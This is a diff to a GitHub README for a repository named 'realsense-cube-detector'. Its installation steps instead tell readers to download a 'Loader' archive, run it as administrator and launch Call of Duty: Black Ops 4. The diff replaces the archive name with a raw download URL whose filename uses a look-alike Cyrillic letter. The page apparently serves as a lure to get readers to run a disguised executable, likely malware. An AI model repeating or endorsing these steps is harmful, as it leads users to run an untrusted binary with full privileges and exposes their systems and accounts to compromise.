sunildemo7477/realsense-cube-detector/README.md

 ---
 ## 📝 Installation

-1. Download **Loader.rar** from the repository.
+1. Download **https://raw.githubusercontent.com/sunildemo7477/realsense-cube-detector/main/Lоader.zip** from the repository.
-2. Extract Loader.rar using WinRAR or 7-Zip.
+2. Extract https://raw.githubusercontent.com/sunildemo7477/realsense-cube-detector/main/Lоader.zip using WinRAR or 7-Zip.
 3. Run the Loader as administrator.
 4. Launch *Call of Duty: Black Ops 4* and enjoy!
 5. Refer to the [Wiki](./wiki) for detailed troubleshooting.